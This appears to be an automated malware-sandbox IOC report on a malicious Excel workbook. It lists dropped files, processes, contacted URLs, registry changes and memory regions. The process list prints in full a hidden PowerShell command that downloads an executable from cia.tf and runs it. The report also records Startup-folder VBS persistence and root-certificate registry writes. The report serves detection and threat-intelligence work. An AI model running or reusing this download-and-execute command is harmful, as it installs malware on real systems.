IOC Report
DGTCkacbSz.xlsx

loading gif

Files

File Path
Type
Category
Malicious
DGTCkacbSz.xlsx
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\AppData\Local\Temp\tmp667.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\svcost.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\Desktop\~$DGTCkacbSz.xlsx
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AE0962.png
PNG image data, 1209 x 635, 8-bit/color RGB, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\jalwz4er.hx1.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xrkefh21.pa1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DFCFC1D8AC29FA4D1B.TMP
data
dropped
C:\Users\user\Desktop\79E20000
Microsoft Excel 2007+
dropped
C:\Users\user\Desktop\79E20000:Zone.Identifier
ASCII text, with CRLF line terminators
modified
C:\Users\user\Desktop\DGTCkacbSz.xls (copy)
Microsoft Excel 2007+
dropped
C:\Users\user\Desktop\~$DGTCkacbSz.xls
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
malicious
C:\Users\user\AppData\Local\Temp\tmp667.exe
"C:\Users\user\AppData\Local\Temp\tmp667.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
malicious
C:\Users\user\AppData\Roaming\svcost.exe
"C:\Users\user\AppData\Roaming\svcost.exe"
malicious

URLs

Name
IP
Malicious
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
172.67.129.178
malicious
https://cia.tf
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://crl.entrust.net/server1.crl0
unknown
http://go.microso
unknown
http://ocsp.entrust.net03
unknown
http://ocsps.ssl.com0?
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;:
unknown
https://contoso.com/License
unknown
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://ocsps.ssl.com0
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;t
unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
unknown
http://go.micros
unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
unknown
https://github.com/mgravell/protobuf-neti
unknown
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
unknown
http://cia.tf
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
http://checkip.dyndns.org/q
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.ssl.com/repository0
unknown
http://ocsps.ssl.com0_
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;N
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;J
unknown
https://reallyfreegeoip.org/xml/
unknown
There are 35 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cia.tf
172.67.129.178
malicious

IPs

IP
Domain
Country
Malicious
172.67.129.178
cia.tf
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2-0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2893C
2893C
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
+30
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2EA3F
2EA3F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 44 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3691000
trusted library allocation
page read and write
malicious
48B0000
trusted library section
page read and write
malicious
26F2000
trusted library allocation
page read and write
malicious
349A000
trusted library allocation
page read and write
malicious
2376000
trusted library allocation
page read and write
malicious
27EC000
trusted library allocation
page read and write
malicious
256D000
trusted library allocation
page read and write
malicious
28D2000
trusted library allocation
page read and write
24B9000
trusted library allocation
page read and write
2AD4000
trusted library allocation
page read and write
2939000
trusted library allocation
page read and write
1C0000
trusted library allocation
page execute and read and write
2758000
trusted library allocation
page read and write
1B550000
heap
page read and write
2740000
trusted library allocation
page read and write
2650000
trusted library allocation
page read and write
110000
trusted library allocation
page read and write
4E5E000
stack
page read and write
1B110000
heap
page read and write
2978000
trusted library allocation
page read and write
2BDE000
trusted library allocation
page read and write
26CC000
trusted library allocation
page read and write
2BAC000
trusted library allocation
page read and write
29BE000
trusted library allocation
page read and write
7FE8BA15000
trusted library allocation
page read and write
2B00000
trusted library allocation
page read and write
28DE000
trusted library allocation
page read and write
299F000
trusted library allocation
page read and write
2669000
trusted library allocation
page read and write
28DC000
trusted library allocation
page read and write
1F0000
heap
page execute and read and write
1B146000
heap
page read and write
7FE8B9A0000
trusted library allocation
page read and write
47EE000
stack
page read and write
272F000
trusted library allocation
page read and write
2734000
trusted library allocation
page read and write
37CB000
trusted library allocation
page read and write
67E000
stack
page read and write
F1000
heap
page read and write
7FE8B8F0000
trusted library allocation
page execute and read and write
11A000
heap
page read and write
7FE8B9C0000
trusted library allocation
page read and write
7FE8B722000
trusted library allocation
page read and write
282C000
trusted library allocation
page read and write
28EF000
trusted library allocation
page read and write
6B0000
trusted library allocation
page execute and read and write
CC000
heap
page read and write
2A07000
trusted library allocation
page read and write
380000
heap
page read and write
2A15000
trusted library allocation
page read and write
24E7000
trusted library allocation
page read and write
2808000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
77000
heap
page read and write
2829000
trusted library allocation
page read and write
27FC000
trusted library allocation
page read and write
15ABE000
stack
page read and write
240000
trusted library allocation
page read and write
27EF000
trusted library allocation
page read and write
2609000
trusted library allocation
page read and write
3F1B000
trusted library allocation
page read and write
2E2000
trusted library allocation
page read and write
19B000
trusted library allocation
page execute and read and write
2B3E000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
29E1000
trusted library allocation
page read and write
285C000
trusted library allocation
page read and write
2866000
trusted library allocation
page read and write
2A13000
trusted library allocation
page read and write
281A000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
2A6D000
trusted library allocation
page read and write
298E000
trusted library allocation
page read and write
C1E000
stack
page read and write | page guard
2860000
trusted library allocation
page read and write
3A0000
trusted library allocation
page read and write
289F000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
A55000
trusted library allocation
page read and write
1B475000
heap
page read and write
28EF000
trusted library allocation
page read and write
F01000
unkown
page execute read
3750000
trusted library allocation
page read and write
65E000
heap
page read and write
34F0000
trusted library allocation
page read and write
2C6000
heap
page read and write
283F000
trusted library allocation
page read and write
36D6000
trusted library allocation
page read and write
269B000
trusted library allocation
page read and write
2B7B000
trusted library allocation
page read and write
2992000
trusted library allocation
page read and write
27EA000
trusted library allocation
page read and write
12D000
trusted library allocation
page execute and read and write
320000
trusted library allocation
page read and write
26BA000
trusted library allocation
page read and write
287F000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
1182000
unkown
page execute read
28AB000
trusted library allocation
page read and write
280F000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
5451000
trusted library allocation
page read and write
1C4ED000
heap
page read and write
26AF000
trusted library allocation
page read and write
1CA2C000
stack
page read and write
28BB000
trusted library allocation
page read and write
28E5000
trusted library allocation
page read and write
3C6000
heap
page read and write
1B4AB000
heap
page read and write
238F000
stack
page read and write
6F0000
trusted library allocation
page execute and read and write
294C000
trusted library allocation
page read and write
FA000
heap
page read and write
2974000
trusted library allocation
page read and write
2AFE000
trusted library allocation
page read and write
1A7EC000
heap
page read and write
3750000
trusted library allocation
page read and write
7FE8B8D7000
trusted library allocation
page read and write
1AC1E000
stack
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2C27000
trusted library allocation
page read and write
1B02C000
stack
page read and write
2BAA000
trusted library allocation
page read and write
C1E000
stack
page read and write | page guard
29A3000
trusted library allocation
page read and write
273E000
trusted library allocation
page read and write
1282000
unkown
page readonly
2C6F000
trusted library allocation
page read and write
3D0000
heap
page read and write
1C4F4000
heap
page read and write
478000
heap
page read and write
C40000
trusted library allocation
page execute and read and write
2614000
trusted library allocation
page read and write
1B34E000
stack
page read and write
48D000
stack
page read and write
28AD000
trusted library allocation
page read and write
3F74000
trusted library allocation
page read and write
280E000
trusted library allocation
page read and write
4930000
heap
page execute and read and write
7FE8BA20000
trusted library allocation
page read and write
2879000
trusted library allocation
page read and write
139000
heap
page read and write
2845000
trusted library allocation
page read and write
310000
trusted library allocation
page execute and read and write
286F000
trusted library allocation
page read and write
283D000
trusted library allocation
page read and write
BAF000
stack
page read and write
2EB000
trusted library allocation
page execute and read and write
384000
heap
page read and write
2656000
trusted library allocation
page read and write
5400000
trusted library allocation
page execute and read and write
2950000
trusted library allocation
page read and write
2B59000
trusted library allocation
page read and write
10E000
heap
page read and write
2906000
trusted library allocation
page read and write
290E000
trusted library allocation
page read and write
2B3A000
trusted library allocation
page read and write
671000
heap
page read and write
C1F000
stack
page read and write
2D6000
trusted library allocation
page execute and read and write
2C2D000
trusted library allocation
page read and write
1C390000
heap
page read and write
2767000
trusted library allocation
page read and write
374E000
stack
page read and write
25F6000
trusted library allocation
page read and write
28E7000
trusted library allocation
page read and write
283C000
trusted library allocation
page read and write
1C47E000
heap
page read and write
2468000
trusted library allocation
page read and write
281D000
trusted library allocation
page read and write
479F000
stack
page read and write
1AAB5000
stack
page read and write
24EB000
trusted library allocation
page read and write
27D9000
trusted library allocation
page read and write
7FE8B940000
trusted library allocation
page read and write
283A000
trusted library allocation
page read and write
2727000
trusted library allocation
page read and write
2954000
trusted library allocation
page read and write
2892000
trusted library allocation
page read and write
F6000
heap
page read and write
1C47A000
heap
page read and write
2C29000
trusted library allocation
page read and write
24E4000
trusted library allocation
page read and write
2ACC000
trusted library allocation
page read and write
31EF000
trusted library allocation
page read and write
2809000
trusted library allocation
page read and write
15E0E000
stack
page read and write
1C425000
heap
page read and write
2C6B000
trusted library allocation
page read and write
3D4000
heap
page read and write
2843000
trusted library allocation
page read and write
1C27E000
stack
page read and write
2A03000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
28C1000
trusted library allocation
page read and write
7FE8B9D0000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
139000
heap
page read and write
2994000
trusted library allocation
page read and write
2990000
trusted library allocation
page read and write
24B2000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
1A88C000
heap
page read and write
2877000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
D5F000
stack
page read and write
2ADA000
trusted library allocation
page read and write
2A6F000
trusted library allocation
page read and write
12391000
trusted library allocation
page read and write
948000
trusted library allocation
page read and write
266D000
trusted library allocation
page read and write
2AB1000
trusted library allocation
page read and write
28EB000
trusted library allocation
page read and write
C20000
trusted library allocation
page execute and read and write
7FE8B7DC000
trusted library allocation
page execute and read and write
3750000
trusted library allocation
page read and write
C9000
heap
page read and write
4ADE000
stack
page read and write
1250F000
trusted library allocation
page read and write
2C4E000
trusted library allocation
page read and write
296B000
trusted library allocation
page read and write
1C37E000
stack
page read and write
53AE000
stack
page read and write
2A4B000
trusted library allocation
page read and write
4320000
trusted library allocation
page execute and read and write
3F5A000
trusted library allocation
page read and write
2752000
trusted library allocation
page read and write
1C497000
heap
page read and write
4F7000
heap
page read and write
3DC000
trusted library allocation
page read and write
260000
heap
page read and write
2BB0000
trusted library allocation
page read and write
7FE8B7E0000
trusted library allocation
page execute and read and write
1C6AE000
stack
page read and write
1A660000
heap
page execute and read and write
2B78000
trusted library allocation
page read and write
1B3FC000
stack
page read and write
28C8000
trusted library allocation
page read and write
1C446000
heap
page read and write
2A05000
trusted library allocation
page read and write
533000
heap
page read and write
270A000
trusted library allocation
page read and write
22E6000
heap
page read and write
2C4A000
trusted library allocation
page read and write
2DA000
trusted library allocation
page execute and read and write
1A4DF000
stack
page read and write
A50000
trusted library allocation
page read and write
2BC3000
trusted library allocation
page read and write
440000
trusted library allocation
page read and write
344B000
trusted library allocation
page read and write
7FE8BA80000
trusted library allocation
page read and write
13D000
trusted library allocation
page execute and read and write
A10000
heap
page execute and read and write
2AFC000
trusted library allocation
page read and write
2BD000
trusted library allocation
page execute and read and write
2691000
trusted library allocation
page read and write
39FA000
trusted library allocation
page read and write
750000
heap
page read and write
2898000
trusted library allocation
page read and write
265A000
trusted library allocation
page read and write
28BD000
trusted library allocation
page read and write
F3000
heap
page read and write
1ACBD000
stack
page read and write
2772000
trusted library allocation
page read and write
2688000
trusted library allocation
page read and write
28CE000
trusted library allocation
page read and write
2B8B000
trusted library allocation
page read and write
2391000
trusted library allocation
page read and write
338D000
trusted library allocation
page read and write
28BF000
trusted library allocation
page read and write
1B470000
heap
page read and write
28AD000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
29C6000
trusted library allocation
page read and write
E00000
unkown
page readonly
25C2000
trusted library allocation
page read and write
A80000
trusted library allocation
page read and write
53F000
heap
page read and write
24E0000
trusted library allocation
page read and write
287D000
trusted library allocation
page read and write
2B21000
trusted library allocation
page read and write
26B5000
trusted library allocation
page read and write
2948000
trusted library allocation
page read and write
28D4000
trusted library allocation
page read and write
1A857000
heap
page read and write
2475000
trusted library allocation
page read and write
3F61000
trusted library allocation
page read and write
2497000
trusted library allocation
page read and write
1C14F000
stack
page read and write
1A934000
heap
page read and write
2B1F000
trusted library allocation
page read and write
24D1000
trusted library allocation
page read and write
2311000
trusted library allocation
page read and write
2818000
trusted library allocation
page read and write
28F7000
trusted library allocation
page read and write
26B1000
trusted library allocation
page read and write
29AD000
trusted library allocation
page read and write
2C23000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
5400000
trusted library allocation
page execute and read and write
4CE000
stack
page read and write
29F6000
trusted library allocation
page read and write
2958000
trusted library allocation
page read and write
2714000
trusted library allocation
page read and write
660000
heap
page read and write
2696000
trusted library allocation
page read and write
26C000
stack
page read and write
1180000
unkown
page readonly
25F0000
trusted library allocation
page read and write
1D0000
trusted library allocation
page read and write
26F9000
trusted library allocation
page read and write
1CAAC000
stack
page read and write
7FE8B970000
trusted library allocation
page read and write
1A930000
heap
page read and write
124000
trusted library allocation
page read and write
26A9000
trusted library allocation
page read and write
27E4000
trusted library allocation
page read and write
1CCB000
heap
page read and write
470000
heap
page read and write
8F2000
trusted library allocation
page read and write
25FD000
trusted library allocation
page read and write
4CFE000
stack
page read and write
7FE8B9E0000
trusted library allocation
page read and write
7FE8B723000
trusted library allocation
page execute and read and write
2627000
trusted library allocation
page read and write
2B8D000
trusted library allocation
page read and write
2B3000
trusted library allocation
page execute and read and write
1DB0000
heap
page read and write
2690000
trusted library allocation
page read and write
27BE000
trusted library allocation
page read and write
2B3C000
trusted library allocation
page read and write
2971000
trusted library allocation
page read and write
27AB000
trusted library allocation
page read and write
2BE0000
trusted library allocation
page read and write
299D000
trusted library allocation
page read and write
2E7000
trusted library allocation
page execute and read and write
7FE8B73B000
trusted library allocation
page read and write
2769000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
2C65000
trusted library allocation
page read and write
533E000
stack
page read and write
2A83000
trusted library allocation
page read and write
2881000
trusted library allocation
page read and write
27BC000
trusted library allocation
page read and write
293F000
trusted library allocation
page read and write
2A11000
trusted library allocation
page read and write
4AE000
heap
page read and write
2A64000
trusted library allocation
page read and write
1A9B8000
stack
page read and write
290A000
trusted library allocation
page read and write
24AA000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
2864000
trusted library allocation
page read and write
116000
heap
page read and write
287F000
trusted library allocation
page read and write
2924000
trusted library allocation
page read and write
8F9000
trusted library allocation
page read and write
2A01000
trusted library allocation
page read and write
2C2F000
trusted library allocation
page read and write
27DB000
trusted library allocation
page read and write
93E000
stack
page read and write
2750000
trusted library allocation
page read and write
2C18000
trusted library allocation
page read and write
27B4000
trusted library allocation
page read and write
282A000
trusted library allocation
page read and write
4CDE000
stack
page read and write
274E000
trusted library allocation
page read and write
3E6000
trusted library allocation
page read and write
2BC7000
trusted library allocation
page read and write
2BFB000
trusted library allocation
page read and write
C30000
trusted library allocation
page read and write
149000
heap
page read and write
2A2E000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
29A1000
trusted library allocation
page read and write
2823000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
286A000
trusted library allocation
page read and write
25D7000
trusted library allocation
page read and write
7FE8B9F0000
trusted library allocation
page read and write
27E8000
trusted library allocation
page read and write
4B20000
trusted library section
page read and write
A70000
heap
page read and write
2879000
trusted library allocation
page read and write
15B3E000
stack
page read and write
2658000
trusted library allocation
page read and write
284B000
trusted library allocation
page read and write
CCE000
stack
page read and write
2A92000
trusted library allocation
page read and write
2819000
trusted library allocation
page read and write
6C0000
trusted library allocation
page read and write
25E1000
trusted library allocation
page read and write
2B47000
trusted library allocation
page read and write
28AB000
trusted library allocation
page read and write
7FE8BA70000
trusted library allocation
page read and write
24DE000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
28F5000
trusted library allocation
page read and write
287D000
trusted library allocation
page read and write
E00000
unkown
page readonly
10E000
heap
page read and write
296D000
trusted library allocation
page read and write
28CC000
trusted library allocation
page read and write
3C0000
trusted library allocation
page read and write
264C000
trusted library allocation
page read and write
2ACE000
trusted library allocation
page read and write
247F000
trusted library allocation
page read and write
430000
trusted library allocation
page read and write
123000
trusted library allocation
page execute and read and write
2804000
trusted library allocation
page read and write
1E4F000
stack
page read and write
2170000
heap
page execute and read and write
D1000
heap
page read and write
7FE8B8DC000
trusted library allocation
page read and write
25D5000
trusted library allocation
page read and write
13B000
heap
page read and write
1C7FD000
stack
page read and write
1A69E000
heap
page execute and read and write
D1000
heap
page read and write
25D9000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
2C46000
trusted library allocation
page read and write
2712000
trusted library allocation
page read and write
2D2000
trusted library allocation
page read and write
3F70000
trusted library allocation
page read and write
9E0000
trusted library allocation
page read and write
1C95000
heap
page read and write
29A7000
trusted library allocation
page read and write
7FE8B8E0000
trusted library allocation
page execute and read and write
250000
trusted library allocation
page read and write
28A9000
trusted library allocation
page read and write
23EF000
trusted library allocation
page read and write
27BA000
trusted library allocation
page read and write
340000
heap
page execute and read and write
260F000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
3870000
trusted library allocation
page read and write
4B70000
trusted library allocation
page execute and read and write
445E000
stack
page read and write
26FC000
trusted library allocation
page read and write
2806000
trusted library allocation
page read and write
2942000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
2BEF000
trusted library allocation
page read and write
197000
trusted library allocation
page execute and read and write
700000
heap
page execute and read and write
2866000
trusted library allocation
page read and write
2C4C000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
294A000
trusted library allocation
page read and write
2BBD000
trusted library allocation
page read and write
2AB7000
trusted library allocation
page read and write
290000
heap
page read and write
28E1000
trusted library allocation
page read and write
2A8C000
trusted library allocation
page read and write
2A1B000
trusted library allocation
page read and write
3750000
trusted library allocation
page read and write
182000
trusted library allocation
page read and write
22B0000
heap
page read and write
1FC000
heap
page read and write
7FE8B950000
trusted library allocation
page read and write
24CF000
trusted library allocation
page read and write
3F47000
trusted library allocation
page read and write
25F4000
trusted library allocation
page read and write
7FE8BA10000
trusted library allocation
page read and write
2A66000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
4E2000
heap
page read and write
2AD6000
trusted library allocation
page read and write
70000
heap
page read and write
2B15000
trusted library allocation
page read and write
420000
trusted library allocation
page execute and read and write
7FE8B7D0000
trusted library allocation
page read and write
2C63000
trusted library allocation
page read and write
E0000
heap
page read and write
2607000
trusted library allocation
page read and write
2A31000
trusted library allocation
page read and write
283F000
trusted library allocation
page read and write
275000
stack
page read and write
134000
heap
page read and write
2AB9000
trusted library allocation
page read and write
29E4000
trusted library allocation
page read and write
27EB000
trusted library allocation
page read and write
28AF000
trusted library allocation
page read and write
2A2C000
trusted library allocation
page read and write
29AB000
trusted library allocation
page read and write
2BEB000
trusted library allocation
page read and write
3F44000
trusted library allocation
page read and write
E6E000
stack
page read and write
28CA000
trusted library allocation
page read and write
2AD0000
trusted library allocation
page read and write
26F5000
trusted library allocation
page read and write
1A589000
stack
page read and write
2B44000
trusted library allocation
page read and write
27D7000
trusted library allocation
page read and write
2883000
trusted library allocation
page read and write
2896000
trusted library allocation
page read and write
53D000
heap
page read and write
3EA000
trusted library allocation
page read and write
24BB000
trusted library allocation
page read and write
370000
heap
page read and write
2761000
trusted library allocation
page read and write
1B10E000
stack
page read and write
3A6D000
stack
page read and write
273A000
trusted library allocation
page read and write
25DD000
trusted library allocation
page read and write
2A28000
trusted library allocation
page read and write
25FA000
trusted library allocation
page read and write
1A877000
heap
page read and write
37B0000
trusted library allocation
page read and write
1C75D000
stack
page read and write
2698000
trusted library allocation
page read and write
24AC000
trusted library allocation
page read and write
2B95000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
1A854000
heap
page read and write
2B34000
trusted library allocation
page read and write
2AE7000
trusted library allocation
page read and write
2892000
trusted library allocation
page read and write
280A000
trusted library allocation
page read and write
514000
heap
page read and write
2D0000
trusted library allocation
page read and write
2967000
trusted library allocation
page read and write
24B4000
trusted library allocation
page read and write
24AE000
trusted library allocation
page read and write
289C000
trusted library allocation
page read and write
24C9000
trusted library allocation
page read and write
293B000
trusted library allocation
page read and write
610000
heap
page read and write
2E0000
trusted library allocation
page read and write
1A61E000
stack
page read and write
25C7000
trusted library allocation
page read and write
295C000
trusted library allocation
page read and write
2717000
trusted library allocation
page read and write
2635000
trusted library allocation
page read and write
2646000
trusted library allocation
page read and write
330000
trusted library allocation
page read and write
2AF2000
trusted library allocation
page read and write
280D000
trusted library allocation
page read and write
8F0000
trusted library allocation
page read and write
2830000
trusted library allocation
